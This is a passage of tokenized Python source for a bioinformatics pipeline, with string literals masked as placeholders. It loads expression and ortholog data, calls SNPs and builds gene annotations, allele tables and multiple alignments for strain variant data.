. biomart_iterator ( columns . keys ( ) <EOL> , biomart = "<STR_LIT>" <EOL> , dataset = "<STR_LIT>" ) <EOL> def transform_data ( data ) : <EOL> for result in data : <EOL> for x in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> result [ x ] = ( "<STR_LIT>" , result [ x ] ) [ result [ x ] >= <NUM_LIT:0> ] <EOL> yield result <EOL> PDatabase . importFromIterator ( outfile <EOL> , tablename <EOL> , transform_data ( data ) <EOL> , columns = columns <EOL> , indices = ( "<STR_LIT>" , ) ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def loadHumanOrthologs ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = P . toTable ( outfile ) <EOL> columns = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> data = PBiomart . biomart_iterator ( columns . keys ( ) <EOL> , biomart = "<STR_LIT>" <EOL> , dataset = "<STR_LIT>" ) <EOL> PDatabase . importFromIterator ( outfile <EOL> , tablename <EOL> , data <EOL> , columns = columns <EOL> , indices = ( "<STR_LIT>" , "<STR_LIT>" , ) ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def loadExpressionDataDanecek ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def loadExpressionData ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> dirs = glob . glob ( os . path . join ( infile , "<STR_LIT>" ) ) <EOL> data = [ ] <EOL> genes = set ( ) <EOL> counter = E . Counter ( ) <EOL> for d in dirs : <EOL> basename = os . path . basename ( d ) <EOL> track = "<STR_LIT>" + re . sub ( "<STR_LIT>" , "<STR_LIT>" , basename ) <EOL> track = re . sub ( "<STR_LIT>" , "<STR_LIT>" , track ) <EOL> track = re . sub ( "<STR_LIT>" , "<STR_LIT>" , track ) <EOL> files = glob . glob ( os . path . join ( d , "<STR_LIT>" ) ) <EOL> counter . dirs += <NUM_LIT:1> <EOL> for f in files : <EOL> values = collections . defaultdict ( str ) <EOL> parts = f . split ( "<STR_LIT:/>" ) <EOL> condition = re . sub ( "<STR_LIT>" , "<STR_LIT>" , parts [ - <NUM_LIT:2> ] ) <EOL> reader = CSV . DictReader ( open ( f , "<STR_LIT:r>" ) , dialect = "<STR_LIT>" ) <EOL> for row in reader : <EOL> if row [ "<STR_LIT:status>" ] == "<STR_LIT:OK>" : <EOL> values [ row [ "<STR_LIT>" ] ] = row [ "<STR_LIT>" ] <EOL> data . append ( ( track + "<STR_LIT:_>" + condition , values ) ) <EOL> genes . update ( set ( values . keys ( ) ) ) <EOL> counter . files += <NUM_LIT:1> <EOL> outf = P . getTempFile ( ) <EOL> outf . write ( "<STR_LIT>" + "<STR_LIT:\t>" . join ( [ x [ <NUM_LIT:0> ] for x in data ] ) + "<STR_LIT:\n>" ) <EOL> counter . genes = len ( genes ) <EOL> for gene_id in genes : <EOL> outf . write ( gene_id ) <EOL> for x in range ( len ( data ) ) : <EOL> outf . write ( "<STR_LIT>" % data [ x ] [ <NUM_LIT:1> ] [ gene_id ] ) <EOL> outf . write ( "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> E . info ( "<STR_LIT:%s>" % str ( counter ) ) <EOL> tmpfile = outf . name <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> os . unlink ( outf . name ) <EOL> @ split ( loadExpressionData , "<STR_LIT>" ) <EOL> def summarizeExpressionPerGene ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> intable = "<STR_LIT>" <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> columns = Database . getColumnNames ( dbhandle , intable ) <EOL> strains = list ( set ( [ "<STR_LIT:_>" . join ( x . split ( "<STR_LIT:_>" ) [ : - <NUM_LIT:1> ] ) for x in columns if x != "<STR_LIT>" ] ) ) <EOL> total = collections . defaultdict ( list ) <EOL> for strain in strains : <EOL> E . info ( "<STR_LIT>" % strain ) <EOL> per_gene = collections . defaultdict ( list ) <EOL> matched_columns = [ x for x in columns if re . match ( strain , x ) ] <EOL> fields = "<STR_LIT:U+002C>" . join ( matched_columns ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> cc = dbhandle . cursor ( ) <EOL> for data in cc . execute ( statement ) : <EOL> per_gene [ data [ <NUM_LIT:0> ] ] . extend ( data [ <NUM_LIT:1> : ] ) <EOL> total [ data [ <NUM_LIT:0> ] ] . extend ( data [ <NUM_LIT:1> : ] ) <EOL> outf = open ( "<STR_LIT>" % strain , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % Stats . Summary ( ) . getHeader ( ) ) <EOL> for gene_id , d in per_gene . iteritems ( ) : <EOL> outf . write ( "<STR_LIT>" % ( gene_id , str ( Stats . Summary ( d ) ) ) ) <EOL> outf . close ( ) <EOL> outf = open ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % Stats . Summary ( ) . getHeader ( ) ) <EOL> for gene_id , d in total . iteritems ( ) : <EOL> outf . write ( "<STR_LIT>" % ( gene_id , str ( Stats . Summary ( d ) ) ) ) <EOL> outf . close ( ) <EOL> @ transform ( summarizeExpressionPerGene , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadExpressionPerGene ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ follows ( indexGenome , loadExpressionData ) <EOL> @ transform ( buildPileups , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def createSNPValidationData ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> strain = track [ len ( "<STR_LIT>" ) : ] <EOL> pattern = "<STR_LIT>" % ( PARAMS [ "<STR_LIT>" ] , strain ) <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( createSNPValidationData , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadSNPValidationData ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ merge ( loadSNPValidationData , "<STR_LIT>" ) <EOL> def buildSNPBlacklist ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> outf = IOTools . openFile ( outfile , "<STR_LIT:w>" ) <EOL> for infile in infiles : <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> statement = '''<STR_LIT>''' <EOL> cc . execute ( statement % locals ( ) ) <EOL> for contig , pos in cc : outf . write ( "<STR_LIT>" % ( track , contig , pos ) ) <EOL> outf . close ( ) <EOL> @ files ( ( ( None , "<STR_LIT>" ) , ) ) <EOL> def recallGenomicSNPs ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> filename_bam = "<STR_LIT>" <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> statement = "<STR_LIT>" <EOL> samfile = pysam . Samfile ( filename_bam , "<STR_LIT:rb>" ) <EOL> fastafile = pysam . Fastafile ( "<STR_LIT>" ) <EOL> i = samfile . pileup ( select = "<STR_LIT>" , fastafile = fastafile ) <EOL> caller = pysam . SNPCaller ( i ) <EOL> outf = IOTools . openFile ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) + "<STR_LIT:\n>" ) <EOL> for contig , pos , ref , genotype , status , genotypes in cc . execute ( statement ) : <EOL> contig = re . sub ( "<STR_LIT>" , "<STR_LIT>" , contig ) <EOL> try : <EOL> call = caller . call ( contig , pos ) <EOL> except ValueError , msg : <EOL> E . warn ( "<STR_LIT>" % ( contig , pos , msg ) ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( map ( str , ( contig , pos , ref , genotype , status , genotypes , <EOL> call . genotype , <EOL> call . consensus_quality , <EOL> call . snp_quality , <EOL> call . mapping_quality , <EOL> call . coverage ) ) ) + "<STR_LIT:\n>" ) <EOL> outf . flush ( ) <EOL> outf . close ( ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def loadEnsembl2Uniprot ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , PARAMS [ '<STR_LIT>' ] ) <EOL> def buildGeneRegions ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . buildGeneRegions ( infile , outfile ) <EOL> @ follows ( buildGeneRegions ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , PARAMS [ '<STR_LIT>' ] ) <EOL> def buildGenes ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . buildProteinCodingGenes ( infile , outfile ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def loadGeneInformation ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . loadGeneInformation ( infile , outfile ) <EOL> @ files ( buildGenes , "<STR_LIT>" ) <EOL> def loadGeneStats ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . loadGeneStats ( infile , outfile ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , PARAMS [ "<STR_LIT>" ] ) <EOL> def buildTranscripts ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . buildProteinCodingTranscripts ( infile , outfile ) <EOL> @ transform ( buildTranscripts , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadTranscripts ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . loadTranscripts ( infile , outfile ) <EOL> @ files ( buildTranscripts , "<STR_LIT>" ) <EOL> def loadTranscriptStats ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . loadTranscriptStats ( infile , outfile ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def loadTranscriptInformation ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . loadTranscriptInformation ( infile , <EOL> outfile , <EOL> only_proteincoding = PARAMS [ "<STR_LIT>" ] ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , PARAMS [ "<STR_LIT>" ] ) , ) ) <EOL> def buildPeptideFasta ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . buildPeptideFasta ( infile , outfile ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , PARAMS [ "<STR_LIT>" ] ) , ) ) <EOL> def buildCDNAFasta ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . buildCDNAFasta ( infile , outfile ) <EOL> @ follows ( loadTranscriptInformation ) <EOL> @ files ( [ ( PARAMS [ "<STR_LIT>" ] , PARAMS [ "<STR_LIT>" ] ) , ] ) <EOL> def buildCDSFasta ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . buildCDSFasta ( infile , outfile ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def loadProteinStats ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . loadProteinStats ( infile , outfile ) <EOL> @ merge ( ( loadProteinStats , loadTranscriptInformation ) , "<STR_LIT>" ) <EOL> def buildSelenoList ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> statement = '''<STR_LIT>''' <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> outf . write ( "<STR_LIT:\n>" . join ( [ x [ <NUM_LIT:0> ] for x in cc . execute ( statement ) ] ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def buildBaseAnnotations ( infile , outfile ) : <EOL> """<STR_LIT>""" <EOL> to_cluster = True <EOL> job_queue = "<STR_LIT>" <EOL> dbname = outfile [ : - len ( "<STR_LIT>" ) ] <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def buildExonAnnotations ( infile , outfile ) : <EOL> """<STR_LIT>""" <EOL> to_cluster = True <EOL> job_queue = "<STR_LIT>" <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" , ) <EOL> def buildGeneAnnotations ( infile , outfile ) : <EOL> """<STR_LIT>""" <EOL> statement = """<STR_LIT>""" <EOL> queue = "<STR_LIT>" <EOL> P . run ( ) <EOL> @ files ( buildGeneAnnotations , "<STR_LIT>" ) <EOL> def makeGeneCounts ( infile , outfile ) : <EOL> """<STR_LIT>""" <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> @ follows ( buildBaseAnnotations , buildExonAnnotations ) <EOL> @ transform ( "<STR_LIT>" , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def makeAnnotations ( infile , outfile ) : <EOL> """<STR_LIT>""" <EOL> to_cluster = True <EOL> bases = "<STR_LIT>" <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> @ transform ( makeAnnotations , <EOL> suffix ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' ) <EOL> def loadAnnotations ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( makeAnnotations , <EOL> suffix ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' ) <EOL> def summarizeAnnotations ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( summarizeAnnotations , <EOL> suffix ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' ) <EOL> def loadAnnotationsSummary ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ follows ( buildSelenoList ) <EOL> @ transform ( '<STR_LIT>' , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def makeEffects ( infile , outfile ) : <EOL> """<STR_LIT>""" <EOL> to_cluster = True <EOL> seleno = "<STR_LIT>" <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> @ transform ( makeEffects , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def loadEffects ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> root = infile [ : - len ( "<STR_LIT>" ) ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> for suffix in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( '<STR_LIT>' , <EOL> suffix ( "<STR_LIT>" ) , <EOL> add_inputs ( buildTranscripts , buildSelenoList ) , <EOL> "<STR_LIT>" ) <EOL> def buildAlleles ( infiles , outfile ) : <EOL> """<STR_LIT>""" <EOL> to_cluster = True <EOL> infile , transcripts , seleno = infiles <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> @ transform ( buildAlleles , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def loadAlleles ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = outfile [ : - len ( "<STR_LIT>" ) ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( loadAlleles , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def summarizeAllelesPerTranscript ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = outfile [ : - len ( "<STR_LIT>" ) ] <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , statement ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , '''<STR_LIT>''' % locals ( ) ) <EOL> Database . executewait ( dbhandle , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % locals ( ) ) <EOL> dbhandle . commit ( ) <EOL> P . touch ( outfile ) <EOL> @ transform ( summarizeAllelesPerTranscript , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def summarizeAllelesPerGene ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = outfile [ : - len ( "<STR_LIT>" ) ] <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , statement ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , '''<STR_LIT>''' % locals ( ) ) <EOL> Database . executewait ( dbhandle , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % locals ( ) ) <EOL> dbhandle . commit ( ) <EOL> P . touch ( outfile ) <EOL> @ merge ( summarizeAllelesPerGene , <EOL> "<STR_LIT>" ) <EOL> def combineSummaryAllelesPerGene ( infiles , outfile ) : <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> tracks = [ x [ : - len ( "<STR_LIT>" ) ] for x in infiles ] <EOL> tablename_prefix = P . toTable ( outfile ) <EOL> fields = "<STR_LIT:U+002CU+0020>" . join ( [ "<STR_LIT>" % x for x in tracks ] ) <EOL> statement_create = '''<STR_LIT>''' <EOL> statement_insert = '''<STR_LIT>''' <EOL> statement_allgenes = "<STR_LIT>" <EOL> for field in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> tablename = "<STR_LIT>" % ( tablename_prefix , field ) <EOL> E . info ( "<STR_LIT>" % tablename ) <EOL> all_genes = dict ( [ ( x [ <NUM_LIT:0> ] , set ( ) ) <EOL> for x in Database . executewait ( dbhandle , statement_allgenes % locals ( ) ) ] ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , statement_create % locals ( ) ) <EOL> for track in tracks : <EOL> statement = """<STR_LIT>""" <EOL> genes = [ x [ <NUM_LIT:0> ] for x in Database . executewait ( dbhandle , statement % locals ( ) ) ] <EOL> for gene in genes : <EOL> all_genes [ gene ] . add ( track ) <EOL> for gene_id , data in all_genes . iteritems ( ) : <EOL> matrix = [ <NUM_LIT:0> ] * len ( tracks ) <EOL> for x , track in enumerate ( tracks ) : <EOL> if track in data : matrix [ x ] = <NUM_LIT:1> <EOL> total = sum ( matrix ) <EOL> matrix = "<STR_LIT:U+002C>" . join ( [ str ( x ) for x in matrix ] ) <EOL> Database . executewait ( dbhandle , statement_insert % locals ( ) ) <EOL> Database . executewait ( dbhandle , <EOL> "<STR_LIT>" % locals ( ) ) <EOL> P . touch ( outfile ) <EOL> @ transform ( loadEffects , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def summarizeEffectsPerGene ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = outfile [ : - len ( "<STR_LIT>" ) ] <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , statement ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> dbhandle . commit ( ) <EOL> P . touch ( outfile ) <EOL> @ follows ( buildGeneAnnotations ) <EOL> @ files_re ( glob . glob ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , <EOL> [ r'<STR_LIT>' , "<STR_LIT>" ] , <EOL> r'<STR_LIT>' ) <EOL> def makeSNPCountsPerGene ( infiles , outfile ) : <EOL> """<STR_LIT>""" <EOL> infile_snps , infile_genes = infiles <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> @ follows ( mkdir ( os . path . join ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) ) ) <EOL> @ merge ( buildAlleles , "<STR_LIT>" ) <EOL> def setupMultipleAlignment ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> targetdir = os . path . join ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> filepool_gtf = IOTools . FilePoolMemory ( "<STR_LIT>" % locals ( ) ) <EOL> filepool_pep = IOTools . FilePoolMemory ( "<STR_LIT>" % locals ( ) ) <EOL> filepool_cds = IOTools . FilePoolMemory ( "<STR_LIT>" % locals ( ) ) <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> map_gene2group = { } <EOL> map_seqid2code = { } <EOL> x = <NUM_LIT:0> <EOL> counts = E . Counter ( ) <EOL> for infile in infiles : <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> E . info ( "<STR_LIT>" % track ) <EOL> reader = CSV . DictReader ( open ( infile + "<STR_LIT>" , "<STR_LIT>" ) , dialect = "<STR_LIT>" ) <EOL> for row in reader : <EOL> counts . input += <NUM_LIT:1> <EOL> gene_id , allele_id , transcript_id = row [ "<STR_LIT>" ] , row [ "<STR_LIT>" ] , row [ "<STR_LIT>" ] <EOL> if gene_id not in map_gene2group : <EOL> map_gene2group [ gene_id ] = len ( map_gene2group ) <EOL> group_id = map_gene2group [ gene_id ] <EOL> new_gene_id = "<STR_LIT:->" . join ( ( gene_id , allele_id ) ) <EOL> if row [ "<STR_LIT>" ] == "<STR_LIT:1>" : code = "<STR_LIT>" <EOL> if row [ "<STR_LIT>" ] == "<STR_LIT:1>" : <EOL> counts . nmd_knockouts += <NUM_LIT:1> <EOL> continue <EOL> else : code = "<STR_LIT>" <EOL> seq_id = SEPARATOR . join ( ( track , transcript_id , new_gene_id ) ) <EOL> map_seqid2code [ seq_id ] = code <EOL> seq_id = SEPARATOR . join ( ( seq_id , code ) ) <EOL> outf . write ( "<STR_LIT>" % ( seq_id , group_id ) ) <EOL> filepool_pep . write ( str ( group_id ) , "<STR_LIT>" % ( seq_id , row [ "<STR_LIT>" ] ) ) <EOL> filepool_cds . write ( str ( group_id ) , "<STR_LIT>" % ( seq_id , row [ "<STR_LIT>" ] ) ) <EOL> counts . written += <NUM_LIT:1> <EOL> with open ( infile + "<STR_LIT>" ) as inf : <EOL> for gtf in GTF . iterator ( inf ) : <EOL> group_id = map_gene2group [ gtf . gene_id ] <EOL> new_gene_id = "<STR_LIT:->" . join ( ( gtf . gene_id , gtf [ "<STR_LIT>" ] ) ) <EOL> seq_id = SEPARATOR . join ( ( track , gtf . transcript_id , new_gene_id ) ) <EOL> seq_id = SEPARATOR . join ( ( seq_id , map_seqid2code [ seq_id ] ) ) <EOL> gtf . transcript_id = seq_id <EOL> filepool_gtf . write ( group_id , str ( gtf ) + "<STR_LIT:\n>" ) <EOL> x += <NUM_LIT:1> <EOL> E . info ( "<STR_LIT>" ) <EOL> filepool_gtf . close ( ) <EOL> filepool_pep . close ( ) <EOL> filepool_cds . close ( ) <EOL> outf . close ( ) <EOL> counts . ngroups = len ( map_gene2group ) <EOL> counts . nsequences = len ( map_seqid2code ) <EOL> E . info ( "<STR_LIT>" % ( str ( counts ) ) ) <EOL> @ transform ( os . path . join ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" , "<STR_LIT:*>" , "<STR_LIT>" ) , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def buildMultipleAlignments ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> filename_cds = track + "<STR_LIT>" <EOL> filename_pep = track + "<STR_LIT>" <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ merge ( buildMultipleAlignments , "<STR_LIT>" ) <EOL> def buildMultipleAlignmentVariantColumns ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> filename_cds = track + "<STR_LIT>" <EOL> filename_pep = track + "<STR_LIT>" <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ merge ( buildMultipleAlignments , "<STR_LIT>" ) <EOL> def mergeMultipleAlignments ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> for section in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> outfilename = outfile + "<STR_LIT:.>" + section + "<STR_LIT>" <EOL> counter = E . Counter ( ) <EOL> E . info ( "<STR_LIT>" % ( section , outfilename ) ) <EOL> outf = gzip . open ( outfilename , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> for infile in infiles : <EOL> counter . input += <NUM_LIT:1> <EOL> dirname , filename = os . path . split ( infile ) <EOL> cluster_id = re . match ( "<STR_LIT>" , filename ) . groups ( ) [ <NUM_LIT:0> ] <EOL> infilename = os . path . join ( dirname , "<STR_LIT>" % ( cluster_id , section ) ) <EOL> if not os . path . exists ( infilename ) : <EOL> counter . missing += <NUM_LIT:1> <EOL> E . warn ( "<STR_LIT>" % infilename ) <EOL> continue <EOL> for entry in FastaIterator . FastaIterator ( open ( infilename , "<STR_LIT:r>" ) ) : <EOL> parts = entry . title . split ( SEPARATOR ) <EOL> if len ( parts ) == <NUM_LIT:4> : <EOL> species , transcript_id , gene_id , code = entry . title . split ( SEPARATOR ) <EOL> elif len ( parts ) == <NUM_LIT:2> : <EOL> species , gene_id = entry . title . split ( SEPARATOR ) <EOL> transcipt_id = gene_id <EOL> code = "<STR_LIT>" <EOL> gene_id , allele_id = gene_id . split ( "<STR_LIT:->" ) <EOL> transcript_id += "<STR_LIT:->" + allele_id <EOL> outf . write ( "<STR_LIT:\t>" . join ( map ( str , <EOL> ( cluster_id , <EOL> species , <EOL> transcript_id , <EOL> gene_id , <EOL> code , <EOL> entry . sequence ) ) ) + "<STR_LIT:\n>" ) <EOL> counter . output += <NUM_LIT:1> <EOL> outf . close ( ) <EOL> E . info ( "<STR_LIT>" % ( outfilename , str ( counter ) ) ) <EOL> P . touch ( outfile ) <EOL> @ merge ( '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> def buildMAF ( infiles , outfile ) : <EOL> tracks = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % x [ : - len ( "<STR_LIT>" ) ] for x in infiles ] ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def exportVariantTable ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> outf = IOTools . openFile ( outfile , "<STR_LIT:w>" ) <EOL> inf = gzip . open ( infile , "<STR_LIT:r>" ) <EOL> headers = [ ] <EOL> ninput = <NUM_LIT:0> <EOL> counts = E . Counter ( ) <EOL> for line in inf : <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> if not headers : headers = data [ <NUM_LIT:9> : ] <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( headers ) ) <EOL> continue <EOL> elif line . startswith ( "<STR_LIT:#>" ) : <EOL> continue <EOL> contig , pos , ref = data [ <NUM_LIT:0> ] , data [ <NUM_LIT:1> ] , data [ <NUM_LIT:3> ] <EOL> pos = int ( pos ) <EOL> counts . input += <NUM_LIT:1> <EOL> contig = "<STR_LIT>" % contig <EOL> output_genotypes = 